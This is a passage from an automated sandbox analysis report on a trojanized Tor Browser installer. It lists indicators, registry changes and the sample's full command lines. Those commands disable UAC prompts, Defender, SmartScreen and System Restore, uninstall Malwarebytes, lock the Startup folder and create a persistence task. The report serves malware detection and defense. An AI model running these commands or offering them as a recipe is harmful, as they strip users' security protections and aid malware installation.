16f47df2e331c8f70920ffc50ed2c14a53b4079cb989028b0900ce7ef18bd623

Analysis

max time kernel
255s
max time network
292s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2022 15:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

torbrowser-install-win64-11.5.8_en-US.exe
Size

271.0MB
MD5

c9bdfd2d99730f4969b16daa7b55f09c
SHA1

d7a3f9e0df14aa53336271f6a80a6a968f52305e
SHA256

16f47df2e331c8f70920ffc50ed2c14a53b4079cb989028b0900ce7ef18bd623
SHA512

9fcf9d5de9ce7d2e054a122c5790713e106dadf58eaa6bfe6049a25adae9966c0efde9ba1db3a61b312e000e1bb2acaaeca4f07266b921c148a2e8cf91c1ed12
SSDEEP

196608:ziJQ0v+cIuxunU9+MJQBGqVUE8Fx0hw35EyN3PN8Cg7Hr0EE2xsJ12QX6Y:ZolunU9XJQBqEwd35Eg3PNgHjEsq

Score

10^/10

discovery evasion exploit trojan

Malware Config

Signatures

Modifies Windows Defender notification settings 3 TTPs 3 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\windows defender security center\notifications\disableenhancednotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows defender security center\notifications	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\windows defender security center\notifications	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 1188 created 4544	1188	svchost.exe	r.exe
PID 1188 created 4532	1188	svchost.exe	r.exe
PID 1188 created 1736	1188	svchost.exe	r.exe
PID 1188 created 4840	1188	svchost.exe	r.exe
PID 1188 created 3852	1188	svchost.exe	r.exe
PID 1188 created 376	1188	svchost.exe	r.exe
PID 1188 created 2496	1188	svchost.exe	r.exe
PID 1188 created 2104	1188	svchost.exe	r.exe

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioruser = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0"	reg.exe

Windows security bypass 2 TTPs 9 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reG.eXereg.eXereg.eXereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\eXclUsiONs\extensIons	reG.eXe
Key created	\REGISTRY\MACHINE\softWare\MicroSOFt\WiNdOWS deFeNder\eXCLuSIons\eXteNsiONS	reg.eXe
Key created	\REGISTRY\MACHINE\soFTWAre\MiCrosofT\WINdoWS defeNder\eXClUSIONs\eXTeNsIonS	reg.eXe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\eXclUsiONs\extensIons\exe = "0"	reg.eXe
Key created	\REGISTRY\MACHINE\sOftWare\mICrosofT\WINdOWS defender\excluSIoNs\PAThs	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\eXclUsiONs\PAThs\C:\Windows\SYsTeM32\driVers\etC\hoSts = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOftWare\mICrosOFT\WIndowS deFender\eXclUsiONs\extensIons	reG.eXe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\eXclUsiONs\extensIons\Scr = "0"	reG.eXe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\eXclUsiONs\extensIons\CMd = "0"	reg.eXe

Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Drops file in Drivers directory 1 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	cmd.exe

Executes dropped EXE 16 IoCs

Processes:

torbrowser-install-win64-11.5.8_en-US.tmptorbrowser-install-win64-11.5.8_en-US.tmpr.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exer.exeobs64.scrobs64.sCr

pid	process
1964	torbrowser-install-win64-11.5.8_en-US.tmp
3304	torbrowser-install-win64-11.5.8_en-US.tmp
4544	r.exe
1736	r.exe
4532	r.exe
4840	r.exe
2232	r.exe
3852	r.exe
1336	r.exe
376	r.exe
2496	r.exe
5076	r.exe
2104	r.exe
1640	r.exe
3236	obs64.scr
3500	obs64.sCr

Possible privilege escalation attempt 5 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid process

2180 icacls.exe
4816 takeown.exe
4168 icacls.exe
2640 icacls.exe
1104 icacls.exe
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

4788 attrib.exe
3084 attrib.exe

pid	process
2180	icacls.exe
4816	takeown.exe
4168	icacls.exe
2640	icacls.exe
1104	icacls.exe

pid	process
4788	attrib.exe
3084	attrib.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

torbrowser-install-win64-11.5.8_en-US.tmptorbrowser-install-win64-11.5.8_en-US.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	torbrowser-install-win64-11.5.8_en-US.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	torbrowser-install-win64-11.5.8_en-US.tmp

Drops startup file 1 IoCs

Processes:

torbrowser-install-win64-11.5.8_en-US.tmp

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBS Studio.lnk	torbrowser-install-win64-11.5.8_en-US.tmp

Modifies file permissions 1 TTPs 5 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

4816 takeown.exe
4168 icacls.exe
2640 icacls.exe
1104 icacls.exe
2180 icacls.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

80 ipINFO.io
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

obs64.scr

pid process

3236 obs64.scr
3236 obs64.scr
Suspicious use of SetThreadContext 1 IoCs

Processes:

obs64.scr

description pid process target process

PID 3236 set thread context of 3500 3236 obs64.scr obs64.sCr
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3264 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

484 taskkill.exe
1144 taskkill.exe

pid	process
4816	takeown.exe
4168	icacls.exe
2640	icacls.exe
1104	icacls.exe
2180	icacls.exe

flow	ioc
80	ipINFO.io

pid	process
3236	obs64.scr
3236	obs64.scr

description	pid	process	target process
PID 3236 set thread context of 3500	3236	obs64.scr	obs64.sCr

pid	process
3264	schtasks.exe

pid	process
484	taskkill.exe
1144	taskkill.exe

Modifies data under HKEY_USERS 20 IoCs

Processes:

r.exer.exer.exer.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	r.exe

Modifies registry class 1 IoCs

Processes:

torbrowser-install-win64-11.5.8_en-US.tmp

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings	torbrowser-install-win64-11.5.8_en-US.tmp

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

torbrowser-install-win64-11.5.8_en-US.tmpr.exer.exer.exer.exer.exer.exer.exer.exeobs64.scr

pid	process
3304	torbrowser-install-win64-11.5.8_en-US.tmp
3304	torbrowser-install-win64-11.5.8_en-US.tmp
4544	r.exe
4544	r.exe
4544	r.exe
4544	r.exe
4532	r.exe
4532	r.exe
4532	r.exe
4532	r.exe
1736	r.exe
1736	r.exe
1736	r.exe
1736	r.exe
4840	r.exe
4840	r.exe
4840	r.exe
4840	r.exe
3852	r.exe
3852	r.exe
3852	r.exe
3852	r.exe
376	r.exe
376	r.exe
376	r.exe
376	r.exe
2496	r.exe
2496	r.exe
2496	r.exe
2496	r.exe
2104	r.exe
2104	r.exe
2104	r.exe
2104	r.exe
3236	obs64.scr
3236	obs64.scr

Suspicious use of AdjustPrivilegeToken 33 IoCs

Processes:

taskkill.exetakeown.exetaskkill.exer.exesvchost.exer.exer.exer.exer.exer.exer.exer.exe

description	pid	process
Token: SeDebugPrivilege	484	taskkill.exe
Token: SeTakeOwnershipPrivilege	4816	takeown.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	4544	r.exe
Token: SeAssignPrimaryTokenPrivilege	4544	r.exe
Token: SeIncreaseQuotaPrivilege	4544	r.exe
Token: 0	4544	r.exe
Token: SeTcbPrivilege	1188	svchost.exe
Token: SeTcbPrivilege	1188	svchost.exe
Token: SeDebugPrivilege	4532	r.exe
Token: SeAssignPrimaryTokenPrivilege	4532	r.exe
Token: SeDebugPrivilege	1736	r.exe
Token: SeAssignPrimaryTokenPrivilege	1736	r.exe
Token: SeIncreaseQuotaPrivilege	1736	r.exe
Token: SeIncreaseQuotaPrivilege	4532	r.exe
Token: 0	4532	r.exe
Token: SeDebugPrivilege	4840	r.exe
Token: SeAssignPrimaryTokenPrivilege	4840	r.exe
Token: SeIncreaseQuotaPrivilege	4840	r.exe
Token: SeDebugPrivilege	3852	r.exe
Token: SeAssignPrimaryTokenPrivilege	3852	r.exe
Token: SeIncreaseQuotaPrivilege	3852	r.exe
Token: 0	3852	r.exe
Token: SeDebugPrivilege	376	r.exe
Token: SeAssignPrimaryTokenPrivilege	376	r.exe
Token: SeIncreaseQuotaPrivilege	376	r.exe
Token: SeDebugPrivilege	2496	r.exe
Token: SeAssignPrimaryTokenPrivilege	2496	r.exe
Token: SeIncreaseQuotaPrivilege	2496	r.exe
Token: 0	2496	r.exe
Token: SeDebugPrivilege	2104	r.exe
Token: SeAssignPrimaryTokenPrivilege	2104	r.exe
Token: SeIncreaseQuotaPrivilege	2104	r.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

torbrowser-install-win64-11.5.8_en-US.tmp

pid process

3304 torbrowser-install-win64-11.5.8_en-US.tmp
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

obs64.scr

pid process

3236 obs64.scr

pid	process
3236	obs64.scr

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

torbrowser-install-win64-11.5.8_en-US.exetorbrowser-install-win64-11.5.8_en-US.tmpcmd.exetorbrowser-install-win64-11.5.8_en-US.exetorbrowser-install-win64-11.5.8_en-US.tmpcmd.exe

description	pid	process	target process
PID 488 wrote to memory of 1964	488	torbrowser-install-win64-11.5.8_en-US.exe	torbrowser-install-win64-11.5.8_en-US.tmp
PID 488 wrote to memory of 1964	488	torbrowser-install-win64-11.5.8_en-US.exe	torbrowser-install-win64-11.5.8_en-US.tmp
PID 488 wrote to memory of 1964	488	torbrowser-install-win64-11.5.8_en-US.exe	torbrowser-install-win64-11.5.8_en-US.tmp
PID 1964 wrote to memory of 3308	1964	torbrowser-install-win64-11.5.8_en-US.tmp	cmd.exe
PID 1964 wrote to memory of 3308	1964	torbrowser-install-win64-11.5.8_en-US.tmp	cmd.exe
PID 1964 wrote to memory of 3308	1964	torbrowser-install-win64-11.5.8_en-US.tmp	cmd.exe
PID 1964 wrote to memory of 4576	1964	torbrowser-install-win64-11.5.8_en-US.tmp	torbrowser-install-win64-11.5.8_en-US.exe
PID 1964 wrote to memory of 4576	1964	torbrowser-install-win64-11.5.8_en-US.tmp	torbrowser-install-win64-11.5.8_en-US.exe
PID 1964 wrote to memory of 4576	1964	torbrowser-install-win64-11.5.8_en-US.tmp	torbrowser-install-win64-11.5.8_en-US.exe
PID 3308 wrote to memory of 484	3308	cmd.exe	taskkill.exe
PID 3308 wrote to memory of 484	3308	cmd.exe	taskkill.exe
PID 3308 wrote to memory of 484	3308	cmd.exe	taskkill.exe
PID 4576 wrote to memory of 3304	4576	torbrowser-install-win64-11.5.8_en-US.exe	torbrowser-install-win64-11.5.8_en-US.tmp
PID 4576 wrote to memory of 3304	4576	torbrowser-install-win64-11.5.8_en-US.exe	torbrowser-install-win64-11.5.8_en-US.tmp
PID 4576 wrote to memory of 3304	4576	torbrowser-install-win64-11.5.8_en-US.exe	torbrowser-install-win64-11.5.8_en-US.tmp
PID 3304 wrote to memory of 2708	3304	torbrowser-install-win64-11.5.8_en-US.tmp	cmd.exe
PID 3304 wrote to memory of 2708	3304	torbrowser-install-win64-11.5.8_en-US.tmp	cmd.exe
PID 3304 wrote to memory of 2708	3304	torbrowser-install-win64-11.5.8_en-US.tmp	cmd.exe
PID 2708 wrote to memory of 2504	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 2504	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 2504	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 1116	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 1116	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 1116	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 5052	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 5052	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 5052	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 4764	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 4764	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 4764	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 2272	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 2272	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 2272	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 3608	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 3608	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 3608	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 1956	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 1956	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 1956	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 4816	2708	cmd.exe	takeown.exe
PID 2708 wrote to memory of 4816	2708	cmd.exe	takeown.exe
PID 2708 wrote to memory of 4816	2708	cmd.exe	takeown.exe
PID 2708 wrote to memory of 4168	2708	cmd.exe	icacls.exe
PID 2708 wrote to memory of 4168	2708	cmd.exe	icacls.exe
PID 2708 wrote to memory of 4168	2708	cmd.exe	icacls.exe
PID 2708 wrote to memory of 1144	2708	cmd.exe	taskkill.exe
PID 2708 wrote to memory of 1144	2708	cmd.exe	taskkill.exe
PID 2708 wrote to memory of 1144	2708	cmd.exe	taskkill.exe
PID 2708 wrote to memory of 2640	2708	cmd.exe	icacls.exe
PID 2708 wrote to memory of 2640	2708	cmd.exe	icacls.exe
PID 2708 wrote to memory of 2640	2708	cmd.exe	icacls.exe
PID 2708 wrote to memory of 3812	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 3812	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 3812	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 2144	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 2144	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 2144	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 1316	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 1316	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 1316	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 4304	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 4304	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 4304	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 4956	2708	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

4788 attrib.exe
3084 attrib.exe

pid	process
4788	attrib.exe
3084	attrib.exe

C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe
"C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:488

C:\Users\Admin\AppData\Local\Temp\is-4I7L7.tmp\torbrowser-install-win64-11.5.8_en-US.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4I7L7.tmp\torbrowser-install-win64-11.5.8_en-US.tmp" /SL5="$E0060,10650007,160256,C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr
3⤵
- Suspicious use of WriteProcessMemory
PID:3308

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im obs64.scr
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:484

C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe
"C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe" /verysilent /sp-
3⤵
- Suspicious use of WriteProcessMemory
PID:4576

C:\Users\Admin\AppData\Local\Temp\is-QAHLO.tmp\torbrowser-install-win64-11.5.8_en-US.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QAHLO.tmp\torbrowser-install-win64-11.5.8_en-US.tmp" /SL5="$6017A,10650007,160256,C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe" /verysilent /sp-
4⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\is-N3RKV.tmp\.cmd"
5⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioradmin" /t reg_dword /d "0" /f
6⤵
- UAC bypass
PID:2504

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioruser" /t reg_dword /d "0" /f
6⤵
- UAC bypass
PID:1116

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "promptonsecuredesktop" /t reg_dword /d "0" /f
6⤵
- UAC bypass
PID:5052

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\spynet" /v "submitsamplesconsent" /t reg_dword /d "2" /f
6⤵
PID:4764

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\spynet" /v "spynetreporting" /t reg_dword /d "0" /f
6⤵
PID:2272

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows defender" /v "puaprotection" /t reg_dword /d "0" /f
6⤵
PID:3608

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\mpengine" /v "mpenablepus" /t reg_dword /d "0" /f
6⤵
PID:1956

C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\system32\smartscreen.exe" /a
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4816

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\system32\smartscreen.exe" /reset
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4168

C:\Windows\SysWOW64\taskkill.exe
taskkill /im smartscreen.exe /f
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\system32\smartscreen.exe" /inheritance:r /remove *s-1-5-32-544 *S-1-5-11 *s-1-5-32-545 *s-1-5-18
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2640

C:\Windows\SysWOW64\reg.exe
reg add "hklm\system\currentcontrolset\control\deviceguard\scenarios\hypervisorenforcedcodeintegrity" /v "enabled" /t reg_dword /d "1" /f
6⤵
PID:3812

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows\system" /v "enablesmartscreen" /t reg_dword /d "0" /f
6⤵
PID:2144

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\explorer" /v "smartscreenenabled" /t reg_sz /d "off" /f
6⤵
PID:1316

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\mrt" /v "dontofferthroughwuau" /t "reg_dword" /d "1" /f
6⤵
PID:4304

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\mrt" /v "dontreportinfectioninformation" /t "reg_dword" /d "1" /f
6⤵
PID:4956

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\ux configuration" /v "notification_suppress" /t reg_dword /d "1" /f
6⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\windows defender exploit guard\controlled folder access" /v "enablecontrolledfolderaccess" /t reg_dword /d "0" /f
6⤵
PID:1460

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\reporting" /v "disableenhancednotifications" /t reg_dword /d "1" /f
6⤵
PID:3808

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\microsoft\windows defender security center\notifications" /v "disableenhancednotifications" /t reg_dword /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:3620

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "filesblockednotificationdisabled" /t reg_dword /d "1" /f
6⤵
PID:3988

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "noactionnotificationdisabled" /t reg_dword /d "1" /f
6⤵
PID:3328

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "summarynotificationdisabled" /t reg_dword /d "1" /f
6⤵
PID:2824

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows\explorer" /v "disablenotificationcenter" /t reg_dword /d "1" /f
6⤵
PID:1792

C:\Windows\SysWOW64\reg.exe
reg add "hkcu\software\microsoft\windows\currentversion\pushnotifications" /v "toastenabled" /t reg_dword /d "0" /f
6⤵
PID:768

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows defender security center\virus and threat protection" /v uilockdown /t reg_dword /d 1 /f
6⤵
PID:4828

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows defender security center\app and browser protection" /v uilockdown /t reg_dword /d 1 /f
6⤵
PID:4480

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disableconfig" /t reg_dword /d "1" /f
6⤵
PID:4796

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disablesr" /t reg_dword /d "1" /f
6⤵
PID:2412

C:\Windows\SysWOW64\reg.exe
reg add "hkcu\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f
6⤵
PID:4216

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f
6⤵
PID:4236

C:\Windows\SysWOW64\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "scanwithantivirus" /t reg_dword /d "1" /f
6⤵
PID:2996

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /remove:d "everyone" /t /c
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1104

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /deny "everyone":(de,dc) /t /c
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2180

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml" /tn ar /f
6⤵
- Creates scheduled task(s)
PID:3264

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Program Files (x86)\malwarebytes\anti-malware\mbuns.exe" /uninstall /verysilent /f
6⤵
PID:4788

C:\Windows\SysWOW64\find.exe
find /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:5104

C:\Windows\SysWOW64\find.exe
find /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:2172

C:\Windows\SysWOW64\find.exe
find /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:4048

C:\Windows\SysWOW64\find.exe
find /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:4184

C:\Windows\SysWOW64\find.exe
find /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:316

C:\Windows\SysWOW64\find.exe
find /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:1932

C:\Windows\SysWOW64\find.exe
find /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:2288

C:\Windows\SysWOW64\find.exe
